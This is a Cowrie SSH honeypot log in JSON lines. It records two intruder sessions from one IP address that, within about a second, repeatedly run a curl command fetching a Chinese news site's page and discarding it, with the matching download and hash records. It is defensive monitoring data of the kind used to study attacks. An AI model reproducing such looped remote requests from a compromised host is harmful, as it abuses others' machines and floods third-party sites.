{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.490742Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.491722Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.495867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.496580Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.516714Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.531354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.532218Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.534051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.534822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.545383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.568726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.569666Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.573919Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.574840Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.608458Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.609422Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.611663Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.612410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.646763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.647624Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.651166Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.651771Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.666690Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.669211Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.675090Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.685935Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.687096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.691306Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.692026Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.725805Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.726881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.729329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.730087Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.763812Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.764696Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.768993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.769722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.774803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.794031Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.813074Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.813735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.817937Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.819079Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.822905Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.830295Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.854522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.855550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.858779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.860083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.897017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.898027Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.901732Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.902542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.918567Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.934746Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.938416Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.939345Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.942047Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.942868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.977270Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.978247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:40.981202Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.982266Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:40.988697Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.015625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.016787Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.020971Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.023926Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.039228Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.054606Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.055572Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.063050Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.063720Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.068263Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.079597Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.093311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.094263Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.099536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.100429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.119370Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.123074Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.128822Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.136686Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.137718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.140845Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.141581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.144526Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.148010Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.175139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.176188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.180953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.181889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.197945Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.203923Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.219846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.220753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
